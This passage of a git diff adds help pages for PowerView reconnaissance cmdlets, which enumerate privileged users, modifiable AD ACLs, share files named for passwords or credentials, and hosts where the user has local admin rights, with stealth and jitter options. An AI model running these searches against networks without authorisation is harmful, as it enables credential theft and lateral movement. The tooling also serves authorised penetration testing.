+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAllowDelegation
+Switch.
+Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AllowDelegation
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckAccess
+Switch.
+Check if the current user has local admin access to computers where target users are found.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ShowAll
+Switch.
+Return all user location results instead of filtering based on target
+specifications.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ShowAll
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Stealth
+Switch.
+Only enumerate sessions from connonly used target servers.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StealthSource
+The source of target servers to use, 'DFS' (distributed file servers),
+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserLocation
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md
new file mode 100755
index 0000000..eeda73a
--- /dev/null
+++ b/docs/Recon/Find-InterestingDomainAcl.md
@@ -0,0 +1,239 @@
+# Find-InterestingDomainAcl
+
+## SYNOPSIS
+Finds object ACLs in the current (or specified) domain with modification
+rights set to non-built in objects.
+
+Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName
+
+## SYNTAX
+
+```
+Find-InterestingDomainAcl [[-Domain] <String>] [-ResolveGUIDs] [-RightsFilter <String>] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
+and for each returned ACE entry it checks if principal security identifier
+is *-1000 (meaning the account is not built in), and also checks if the rights for
+the ACE mean the object can be modified by the principal.
+If these conditions are met,
+then the security identifier SID is translated, the domain object is retrieved, and
+additional IdentityReference* information is appended to the output object.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingDomainAcl
+```
+
+Finds interesting object ACLS in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
+```
+
+Finds interesting object ACLS in the ev.testlab.local domain and
+resolves rights GUIDs to display names.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveGUIDs
+Switch.
+Resolve GUIDs to their display names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsFilter
+{{Fill RightsFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ACL
+
+Custom PSObject with ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md
new file mode 100755
index 0000000..511510f
--- /dev/null
+++ b/docs/Recon/Find-InterestingDomainShareFile.md
@@ -0,0 +1,463 @@
+# Find-InterestingDomainShareFile
+
+## SYNOPSIS
+Searches for files matching specific criteria on readable shares
+in the domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction
+
+## SYNTAX
+
+### FileSpecification (Default)
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-Include <String[]>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-LastAccessTime <DateTime>] [-LastWriteTime <DateTime>]
+ [-CreationTime <DateTime>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+### OfficeDocs
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-OfficeDocs] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### FreshEXEs
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-FreshEXEs] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare.
+It will then use Find-InterestingFile on each
+readhable share, searching for files marching specific criteria.
+If -Credential
+is passed, then Invoke-UserImpersonation is used to impersonate the specified
+user before enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingDomainShareFile
+```
+
+Finds 'interesting' files on the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
+```
+
+Finds 'interesting' files on readable shares on the specified systems.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
+
+Searches interesting files in the testlab.local domain using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Include
+Only return files/folders that match the specified array of strings,
+i.e.
+@(*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: String[]
+Parameter Sets: FileSpecification
+Aliases: SearchTerms, Terms
+
+Required: False
+Position: Named
+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SharePath
+Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Share
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludedShares
+Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: @('C$', 'Admin$', 'Print$', 'IPC$')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastAccessTime
+Only return files with a LastAccessTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastWriteTime
+Only return files with a LastWriteTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CreationTime
+Only return files with a CreationTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OfficeDocs
+Switch.
+Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: OfficeDocs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FreshEXEs
+Switch.
+Find .EXEs accessed within the last 7 days.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FreshEXEs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.FoundFile
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md
new file mode 100755
index 0000000..2fe6abf
--- /dev/null
+++ b/docs/Recon/Find-InterestingFile.md
@@ -0,0 +1,248 @@
+# Find-InterestingFile
+
+## SYNOPSIS
+Searches for files on the given path that match a series of specified criteria.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
+
+## SYNTAX
+
+### FileSpecification (Default)
+```
+Find-InterestingFile [[-Path] <String[]>] [-Include <String[]>] [-LastAccessTime <DateTime>]
+ [-LastWriteTime <DateTime>] [-CreationTime <DateTime>] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess]
+ [-Credential <PSCredential>]
+```
+
+### OfficeDocs
+```
+Find-InterestingFile [[-Path] <String[]>] [-OfficeDocs] [-CheckWriteAccess] [-Credential <PSCredential>]
+```
+
+### FreshEXEs
+```
+Find-InterestingFile [[-Path] <String[]>] [-FreshEXEs] [-CheckWriteAccess] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function recursively searches a given UNC path for files with
+specific keywords in the name (default of pass, sensitive, secret, admin,
+login and unattend*.xml).
+By default, hidden files/folders are included
+in search results.
+If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
+is used to temporarily map the remote share.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingFile -Path "C:\Backup\"
+```
+
+Returns any files on the local path C:\Backup\ that have the default
+search term set in the title.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
+```
+
+Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default
+search term set in the title and were accessed within the last week.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\"
+
+## PARAMETERS
+
+### -Path
+UNC/local path to recursively search.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: .\
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Include
+Only return files/folders that match the specified array of strings,
+i.e.
+@(*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: String[]
+Parameter Sets: FileSpecification
+Aliases: SearchTerms, Terms
+
+Required: False
+Position: Named
+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastAccessTime
+Only return files with a LastAccessTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastWriteTime
+Only return files with a LastWriteTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CreationTime
+Only return files with a CreationTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OfficeDocs
+Switch.
+Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: OfficeDocs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FreshEXEs
+Switch.
+Find .EXEs accessed within the last 7 days.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FreshEXEs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeFolders
+Switch.
+Exclude folders from the search results.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeHidden
+Switch.
+Exclude hidden files and folders from the search results.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckWriteAccess
+Switch.
+Only returns files the current user has write access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+to connect to remote systems for file enumeration.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.FoundFile
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md
new file mode 100755
index 0000000..f3e3b6f
--- /dev/null
+++ b/docs/Recon/Find-LocalAdminAccess.md
@@ -0,0 +1,337 @@
+# Find-LocalAdminAccess
+
+## SYNOPSIS
+Finds machines on the local domain where the current user has local administrator access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-LocalAdminAccess [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and for each computer it checks if the current user
+has local administrator access using Test-AdminAccess.
+If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+Idea adapted from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'
+ 'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'
+ 'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-LocalAdminAccess
+```
+
+Finds machines in the current domain the current user has admin access to.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-LocalAdminAccess -Domain dev.testlab.local
+```
+
+Finds machines in the dev.testlab.local domain the current user has admin access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-LocalAdminAccess -Domain testlab.local -Credential $Cred
+
+Finds machines in the testlab.local domain that the user with the specified -Credential
+has admin access to.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckShareAccess
+Switch.
+Only display found shares that the local user has access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
